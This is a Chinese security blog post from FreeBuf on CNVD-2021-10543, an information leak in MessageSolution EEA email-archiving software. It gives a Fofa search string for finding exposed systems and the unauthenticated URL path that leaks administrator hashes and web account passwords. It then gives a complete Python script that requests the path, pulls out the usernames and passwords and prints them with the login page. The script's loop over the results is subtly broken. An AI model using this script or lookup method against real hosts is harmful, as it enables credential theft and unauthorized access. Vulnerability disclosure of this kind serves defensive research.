freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

(CNVD-2021-10543)|MessageSolution 企业邮件归档管理系统 EEA 存...
2021-03-22 13:18:53

0x01 漏洞说明

MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码。

0x02 影响版本

  • MessageSolution Enterprise Email Archiving (EEA)

0x03 漏洞复现

Fofa搜索标题:(注意:互联网的非授权利用属于违法行为)

1616388109_6058200de451706f28aaa.png!small?1616388110296

MessageSolution企业邮件归档管理系统首页为这样:1616389048_605823b81b91dae6697ed.png!small?1616389055602

访问URL查看泄漏的hash和web账号密码:

http://xxx.xxx.xxx/authenticationserverservlet/

1616389205_605824558594c07be7540.png!small?1616389205976

获取到账号、密码后即可访问url进行登录:

https://xxx.xxx.xxx.xxx/indexcommon.jsp

1616388970_6058236a382651adf84ae.png!small?1616388970881

脚本POC:

# CNVD-2021-10543
# MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞
# fofa: title="MessageSolution"

import requests
import time
import json
from bs4 import BeautifulSoup
# 忽略SSL证书校验提醒
requests.packages.urllib3.disable_warnings()

def title():
    print("+-------------------------------------------------+")
    print("+-----------    CNVD-2021-10543   ----------------+")
    print("+----------- MessageSolution信息泄漏 --------------+")
    print('+--------- Fofa: title="MessageSolution" ---------+')
    print("+--------  use: python3 CNVD-2021-10543.py -------+")
    print("+-------------------------------------------------+")

def target_url(url):
    target_url = url + "/authenticationserverservlet/"
    login_url = url + "/indexcommon.jsp"
    # verify = False 忽略SSL证书校验
    try:
        res = requests.get(url=target_url, verify=False,timeout=5)
        if "administrator" in res.text and res.status_code == 200:
            print(f"[!] \033[31m目标系统: {url} 存在信息泄漏\033[0m")
            time.sleep(1)
            print("[!] \033[31m正在获取目标系统敏感信息.........\033[0m")
            bs_xml = BeautifulSoup(res.text,features="html.parser")
            user_names = bs_xml.findAll('username')
            passwords = bs_xml.findAll('password')
            i = 1
            print(f"[!] \033[31m获取到目标系统信息:\033[0m")
            if i < len(user_names):
                for user_name,password  in user_names,passwords:
                    print(f"   用户名: {user_name.text}    密 码: {password.text}")
                    i = i+1
            else:
                print(f"   用户名: {user_names[0].text}\n   密 码: {passwords[0].text}")
            print(f"\033[32m[0] 请访问: {login_url} 进行登录!")
        else:
            print(f"[0]  \033[32m目标系统: {url} 不存在信息泄\033[0m")
    except Exception as e:
        print(f"[!]  目标系统: {url} 出现意外错误:\n {e}")




if __name__ == "__main__":
    title()
    url = str(input("[0] 请输入目标站点URL:\n"))
    target_url(url)

0x04 修复建议

厂商暂未给出修复建议​。

建议用户将该系统放置在内网,不要暴露在互联网,同时禁止未授权访问相关文件​。


结束语

本文章仅用于交流学习,请勿使用该漏洞进行违法活动。

https://github.com/Henry4E36/CNVD-2021-10543

# poc # web安全 # 漏洞分析
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者